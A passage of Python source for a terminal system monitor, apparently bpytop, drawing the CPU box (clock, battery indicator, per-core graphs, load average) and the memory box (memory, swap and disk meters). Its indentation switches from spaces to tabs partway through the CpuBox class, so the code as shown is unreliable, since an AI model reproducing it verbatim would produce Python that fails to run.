    #* Match the configured shown_boxes against a preset (order-insensitive), else register a "user" preset
    for view_mode in view_modes:
        if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
            break
    else:
        view_mode = "user"
        view_modes["user"] = CONFIG.shown_boxes.split()
    height_p: int
    width_p: int
    x: int
    y: int
    width: int
    height: int
    out: str
    bg: str
    _b_cpu_h: int
    _b_mem_h: int
    redraw_all: bool
    buffers: List[str] = []
    clock_on: bool = False
    clock: str = ""
    clock_len: int = 0
    resized: bool = False
    #* Replacement values for the custom tokens usable in CONFIG.draw_clock
    clock_custom_format: Dict[str, Any] = {
        "/host" : os.uname()[1],
        "/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
        "/uptime" : "",
        }
    if clock_custom_format["/host"].endswith(".local"):
        clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
    @classmethod
    def calc_sizes(cls):
        '''Calculate sizes of boxes'''
        cls.boxes = CONFIG.shown_boxes.split()
        for sub in cls.__subclasses__():
            sub._calc_size() # type: ignore
            sub.resized = True # type: ignore
    @classmethod
    def draw_update_ms(cls, now: bool = True):
        '''Draw the "+ NNNms -" update interval widget on the cpu box title line.'''
        if not "cpu" in cls.boxes: return
        update_string: str = f'{CONFIG.update_ms}ms'
        xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
        if not "+" in Key.mouse:
            #* Register the "+" and "-" glyph positions as clickable regions
            Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
            Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
        Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
            f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
            f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
        if now and not Menu.active:
            Draw.clear("update_ms")
            if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
                Draw.out("battery")
    @classmethod
    def draw_clock(cls, force: bool = False):
        '''Draw the clock in the cpu box title when enabled; redraws only when the string changes.'''
        if not "cpu" in cls.boxes or not cls.clock_on: return
        out: str = ""
        if force: pass
        elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
        clock_string = cls.clock = strftime(CONFIG.draw_clock)
        for custom in cls.clock_custom_format:
            if custom in clock_string:
                if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
                clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
        clock_len = len(clock_string[:(CpuBox.width-56)])
        if cls.clock_len != clock_len and not CpuBox.resized:
            #* Length changed: erase the previously drawn clock with box-line characters first
            out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
        cls.clock_len = clock_len
        now: bool = False if Menu.active else not force
        out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
            f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
        Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
        if now and not Menu.active:
            if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
                Draw.out("battery")
    @classmethod
    def empty_bg(cls) -> str:
        '''Screen shown when every box is hidden: banner (if it fits) plus key hints.'''
        return (f'{Term.clear}' +
            (f'{Banner.draw(Term.height // 2 - 10, center=True)}'
            f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
            f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
            f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
            f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
            f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
            f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
            f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
            f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
            f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
    @classmethod
    def draw_bg(cls, now: bool = True):
        '''Draw all boxes outlines and titles'''
        out: str = ""
        if not cls.boxes:
            out = cls.empty_bg()
        else:
            out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
        Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
        cls.draw_update_ms(now=now)
        if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
    '''Geometry attributes for the inner sub-box drawn inside a main box (mixed into the box classes).'''
    box_x: int = 0
    box_y: int = 0
    box_width: int = 0
    box_height: int = 0
    box_columns: int = 0
    column_size: int = 0
class CpuBox(Box, SubBox):
    '''The cpu box: usage graphs, per-core meters, load average, battery and clock widgets.'''
    name = "cpu"
    num = 1
    x = 1
    y = 1
    height_p = 32                           # percent of terminal height when other boxes are shown
    width_p = 100
    min_w: int = 60
    min_h: int = 8
    resized: bool = True
    redraw: bool = False
    buffer: str = "cpu"
    battery_percent: int = 1000             # 1000 acts as "never read" sentinel
    battery_secs: int = 0
    battery_status: str = "Unknown"
    old_battery_pos = 0
    old_battery_len = 0
    battery_path: Union[str, None] = ""     # "" = not probed yet, None = no sysfs battery found
    battery_clear: bool = False
    battery_symbols: Dict[str, str] = {"Charging": "▲",
                                       "Discharging": "▼",
                                       "Full": "■",
                                       "Not charging": "■"}
    clock_block: bool = True
    Box.buffers.append(buffer)
    @classmethod
    def _calc_size(cls):
        '''Compute box and inner core-grid geometry from terminal size, thread count and sensor availability.'''
        if not "cpu" in cls.boxes:
            Box._b_cpu_h = 0
            cls.width = Term.width
            return
        cpu = CpuCollector
        height_p: int
        if cls.boxes == ["cpu"]:
            height_p = 100      # cpu is the only box: take the full terminal height
        else:
            height_p = cls.height_p
        cls.width = round(Term.width * cls.width_p / 100)
        cls.height = round(Term.height * height_p / 100)
        if cls.height < 8: cls.height = 8
        Box._b_cpu_h = cls.height
        cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
        #* NOTE(review): "(20 + 13 if ... else 21)" parses as "(33 if ... else 21)" by
        #* operator precedence — presumably intended; confirm before restructuring
        if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
            cls.column_size = 2
            cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
        elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
            cls.column_size = 1
            cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
        elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
            cls.column_size = 0
        else:
            cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
        if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
        cls.box_height = ceil(THREADS / cls.box_columns) + 4
        if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
        #* Right-align the inner box and center it vertically
        cls.box_x = (cls.width - 1) - cls.box_width
        cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
    @classmethod
    def _draw_bg(cls) -> str:
        '''Return the cpu box outline, the "Menu" title button and the inner core-grid box.'''
        if not "cpu" in cls.boxes: return ""
        if not "M" in Key.mouse:
            #* Register the "Menu" title text as a clickable region
            Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
        return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
        f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
        f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
    @classmethod
    def battery_activity(cls) -> bool:
        '''Poll battery state via psutil/sysfs; return True when the widget needs redrawing.'''
        if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
            if cls.battery_percent != 1000:
                cls.battery_clear = True    # battery disappeared: erase the widget on next draw
            return False
        if cls.battery_path == "":
            #* First call: probe sysfs once for a battery directory to read status from
            cls.battery_path = None
            if os.path.isdir("/sys/class/power_supply"):
                for directory in sorted(os.listdir("/sys/class/power_supply")):
                    if directory.startswith('BAT') or 'battery' in directory.lower():
                        cls.battery_path = f'/sys/class/power_supply/{directory}/'
                        break
        return_true: bool = False
        percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
        if percent != cls.battery_percent:
            cls.battery_percent = percent
            return_true = True
        seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
        if seconds != cls.battery_secs:
            cls.battery_secs = seconds
            return_true = True
        status: str = "not_set"
        if cls.battery_path:
            status = readfile(cls.battery_path + "status", default="not_set")
        #* Fall back to psutil's power_plugged flag when sysfs gave no status
        if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
            status = "Charging" if cls.battery_percent < 100 else "Full"
        elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
            status = "Discharging"
        elif status == "not_set":
            status = "Unknown"
        if status != cls.battery_status:
            cls.battery_status = status
            return_true = True
        return return_true or cls.resized or cls.redraw or Menu.active
	@classmethod
	def _draw_fg(cls):
		"""Draw the dynamic cpu box content: cpu graphs, per-core meters, temps,
		battery status, load average and uptime, then flush to the draw buffer."""
		if not "cpu" in cls.boxes: return
		cpu = CpuCollector
		if cpu.redraw: cls.redraw = True
		out: str = ""
		out_misc: str = ""
		lavg: str = ""
		#* Inner drawable area of the outer box and of the stats sub-box
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
		hh: int = ceil(h / 2)
		hh2: int = h - hh
		mid_line: bool = False
		temp: int = 0
		unit: str = ""
		#* A divider line between upper/lower graph is only drawn when they show different stats
		if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
			mid_line = True
			if h % 2: hh = floor(h / 2)
			else: hh2 -= 1
		hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
		ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
		#* Rebuild graphs/meters and the "mode" button only when size or layout changed
		if cls.resized or cls.redraw:
			if not "m" in Key.mouse:
				Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
			out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
			Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper, round_up_low=True)
			if not CONFIG.cpu_single_graph:
				Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower, round_up_low=True)
			Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
			if cls.column_size > 0 or ct_width > 0:
				for n in range(THREADS):
					Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
			if cpu.got_sensors:
				Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
				if cls.column_size > 1:
					for n in range(1, THREADS + 1):
						if not cpu.cpu_temp[n]:
							continue
						Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
			Draw.buffer("cpu_misc", out_misc, only_save=True)
		#* Battery indicator in the top border; battery_activity() also reports pending redraws
		if CONFIG.show_battery and cls.battery_activity():
			bat_out: str = ""
			if cls.battery_secs > 0:
				battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
			else:
				battery_time = ""
			if not hasattr(Meters, "battery") or cls.resized:
				Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
			battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
			battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
			battery_pos = cls.width - battery_len - 17
			#* Erase the old indicator if its position or width changed
			if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
				bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
			cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
			bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
				("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
				f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
			Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
		elif cls.battery_clear:
			#* Battery disappeared: wipe the indicator and reset cached state
			out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
			cls.battery_clear = False
			cls.battery_percent = 1000
			cls.battery_secs = 0
			cls.battery_status = "Unknown"
			cls.old_battery_pos = 0
			cls.old_battery_len = 0
			cls.battery_path = ""
			Draw.clear("battery", saved=True)
		#* cx/cy: cursor inside the sub-box, cc: current column, ccw: column width
		cx = cy = cc = 0
		ccw = (bw + 1) // cls.box_columns
		if cpu.cpu_freq:
			freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
			out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
		out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
		if mid_line:
			out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
				f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
		if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
			out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
		#* Total cpu usage meter, then one line per logical core
		out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
			f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
		if cpu.got_sensors:
			try:
				temp, unit = temperature(cpu.cpu_temp[0][-1], CONFIG.temp_scale)
				out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
					f'{temp:>4}{THEME.main_fg}{unit}')
			except:
				#* Any sensor read/format failure permanently disables temperature display
				cpu.got_sensors = False
		cy += 1
		for n in range(1, THREADS + 1):
			out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
			if cls.column_size > 0 or ct_width > 0:
				out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
			else:
				out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
			out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
			if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
				try:
					temp, unit = temperature(cpu.cpu_temp[n][-1], CONFIG.temp_scale)
					if cls.column_size > 1:
						out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[n][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
					else:
						out += f'{THEME.gradient["temp"][min_max(temp, 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}'
					out += f'{temp:>4}{THEME.main_fg}{unit}'
				except:
					cpu.got_sensors = False
			elif cpu.got_sensors and not hide_cores:
				out += f'{Mv.r(max(6, 6 * cls.column_size))}'
			out += f'{THEME.div_line(Symbol.v_line)}'
			cy += 1
			#* Wrap to the next column when this one is full
			if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
				cc += 1; cy = 1; cx = ccw * cc
				if cc == cls.box_columns: break
		if cy < bh - 1: cy = bh - 1
		#* Load average line, format chosen by available column width
		if cy < bh and cc < cls.box_columns:
			if cls.column_size == 2 and cpu.got_sensors:
				lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
			elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
				lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
			elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
				lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
			else:
				lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
			out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
		if CONFIG.show_uptime:
			out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
		cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
	"""Box showing memory and swap usage, and optionally disk usage and disk IO graphs."""
	name = "mem"
	num = 2
	height_p = 38
	width_p = 45
	min_w: int = 36
	min_h: int = 10
	x = 1
	y = 1
	mem_meter: int = 0   # width of the memory meters/graphs
	mem_size: int = 0    # layout size class 1-3, set by _calc_size()
	disk_meter: int = 0  # width of the disk meters
	divider: int = 0     # x position of the mem/disks divider line
	mem_width: int = 0
	disks_width: int = 0
	disks_io_h: int = 0  # height of each disk IO graph
	disks_io_order: List[str] = []
	graph_speeds: Dict[str, int] = {}
	graph_height: int
	resized: bool = True
	redraw: bool = False
	buffer: str = "mem"
	swap_on: bool = CONFIG.show_swap
	Box.buffers.append(buffer)
	mem_names: List[str] = ["used", "available", "cached", "free"]
	swap_names: List[str] = ["used", "free"]

	@classmethod
	def _calc_size(cls):
		"""Calculate box dimensions, meter widths and layout size class from the
		terminal size and which other boxes are shown."""
		if not "mem" in cls.boxes:
			Box._b_mem_h = 0
			cls.width = Term.width
			return
		width_p: int; height_p: int
		if not "proc" in cls.boxes:
			width_p = 100
		else:
			width_p = cls.width_p
		if not "cpu" in cls.boxes:
			height_p = 60 if "net" in cls.boxes else 98
		elif not "net" in cls.boxes:
			height_p = 98 - CpuBox.height_p
		else:
			height_p = cls.height_p
		cls.width = round(Term.width * width_p / 100)
		cls.height = round(Term.height * height_p / 100) + 1
		if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
		Box._b_mem_h = cls.height
		cls.y = Box._b_cpu_h + 1
		#* Split the box between memory and disks when disks are shown
		if CONFIG.show_disks:
			cls.mem_width = ceil((cls.width - 3) / 2)
			cls.disks_width = cls.width - cls.mem_width - 3
			if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
			cls.divider = cls.x + cls.mem_width
		else:
			cls.mem_width = cls.width - 1
		item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
		if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
		elif cls.mem_width > 25: cls.mem_size = 2
		else: cls.mem_size = 1
		cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
		if cls.mem_size == 1: cls.mem_meter += 6
		if cls.mem_meter < 1: cls.mem_meter = 0
		if CONFIG.mem_graphs:
			cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
			if cls.graph_height == 0: cls.graph_height = 1
			if cls.graph_height > 1: cls.mem_meter += 6
		else:
			cls.graph_height = 0
		if CONFIG.show_disks:
			cls.disk_meter = cls.width - cls.mem_width - 23
			if cls.disks_width < 25:
				cls.disk_meter += 10
			if cls.disk_meter < 1: cls.disk_meter = 0

	@classmethod
	def _draw_bg(cls) -> str:
		"""Return the static background: box outline, mem/disks divider and [d]isks button."""
		if not "mem" in cls.boxes: return ""
		out: str = ""
		out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
		if CONFIG.show_disks:
			out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
				f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
				f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
				f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
			Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
		else:
			out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
			Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
		return out

	@classmethod
	def _draw_fg(cls):
		"""Draw the dynamic content: memory/swap meters or graphs and, when enabled,
		per-disk usage meters and IO graphs, then flush to the draw buffer."""
		if not "mem" in cls.boxes: return
		mem = MemCollector
		if mem.redraw: cls.redraw = True
		out: str = ""
		out_misc: str = ""
		gbg: str = ""
		gmv: str = ""
		gli: str = ""
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		#* Rebuild all meters/graphs and buttons when size or layout changed
		if cls.resized or cls.redraw:
			cls.redraw = True
			cls._calc_size()
			out_misc += cls._draw_bg()
			Meters.mem = {}
			Meters.swap = {}
			Meters.disks_used = {}
			Meters.disks_free = {}
			if cls.mem_meter > 0:
				for name in cls.mem_names:
					if CONFIG.mem_graphs:
						Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
					else:
						Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
				if cls.swap_on:
					for name in cls.swap_names:
						if CONFIG.swap_disk and CONFIG.show_disks:
							break
						elif CONFIG.mem_graphs and not CONFIG.swap_disk:
							Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
						else:
							Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
			if CONFIG.show_disks and mem.disks:
				if CONFIG.show_io_stat or CONFIG.io_mode:
					d_graph: List[str] = []
					d_no_graph: List[str] = []
					l_vals: List[Tuple[str, int, str, bool]] = []
					if CONFIG.io_mode:
						cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
						if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
					else:
						cls.disks_io_h = 1
					#* Parse user-set "disk:speed" pairs for fixed IO graph scales
					if CONFIG.io_graph_speeds and not cls.graph_speeds:
						try:
							cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
						except (KeyError, ValueError):
							errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
					for name in mem.disks.keys():
						if name in mem.disks_io_dict:
							d_graph.append(name)
						else:
							d_no_graph.append(name)
							continue
						if CONFIG.io_graph_combined or not CONFIG.io_mode:
							l_vals = [("rw", cls.disks_io_h, "available", False)]
						else:
							l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
						Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
							data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
							for _name, _height, _gradient, _invert in l_vals}
					cls.disks_io_order = d_graph + d_no_graph
				if cls.disk_meter > 0:
					for n, name in enumerate(mem.disks.keys()):
						if n * 2 > h: break
						Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
						if len(mem.disks) * 3 <= h + 1:
							Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
			#* Clickable [g]raph / [s]wap / [i]o toggle buttons in the top border
			if not "g" in Key.mouse:
				Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
			out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
				f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
			if CONFIG.show_disks:
				if not "s" in Key.mouse:
					Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
					f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
				if not "i" in Key.mouse:
					Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
				out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
					f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
			if Collector.collect_interrupt: return
			Draw.buffer("mem_misc", out_misc, only_save=True)
		try:
			#* Mem
			cx = 1; cy = 1
			out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
			if cls.graph_height > 0:
				gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
			if cls.graph_height >= 2:
				gbg = f'{Mv.l(1)}'
				gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
			big_mem: bool = cls.mem_width > 21
			for name in cls.mem_names:
				if cy > h - 1: break
				if Collector.collect_interrupt: return
				if cls.mem_size > 2:
					out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
						f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
					cy += 2 if not cls.graph_height else cls.graph_height + 1
				else:
					out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
					cy += 1 if not cls.graph_height else cls.graph_height
			#* Swap
			if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
				if h - cy > 5:
